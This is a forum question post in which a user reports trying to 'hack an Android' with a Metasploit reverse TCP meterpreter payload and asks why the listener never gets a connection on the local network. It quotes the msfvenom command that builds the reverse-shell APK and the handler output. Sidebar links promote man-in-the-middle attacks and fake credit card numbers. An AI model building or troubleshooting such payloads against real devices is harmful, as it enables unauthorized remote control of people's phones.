Payload Android Not Connect to Metasploit Listener Kali 2019

Nov 28, 2019 08:06 PM

Hello I am trying to hack an Android via a reverse tcp payload

I generated the payload with

Msfvenom -p Android/meterpreter/reverse-tcp lhost= my-wlan0-ip lport=4444 R> payload.apk

Both the laptop and the Android are in the same network

But when I launch the exploit

It stop here

Started reverse tcp handler on 192.168.x.x:44444

Then nothing

I already try this with ngrok and it worked for me , but I wanted to do it in locale Network but it is not working

I am using Kali 2019 with the last version of metasploit

Related Articles

637587411395252764.jpg

How to Perform Advanced Man-in-the-Middle Attacks with Xerosploit

635211718118959676.jpg

How to Get Unlimited Free Trials Using a "Real" Fake Credit Card Number

Comments

No Comments Exist

Be the first, drop a comment!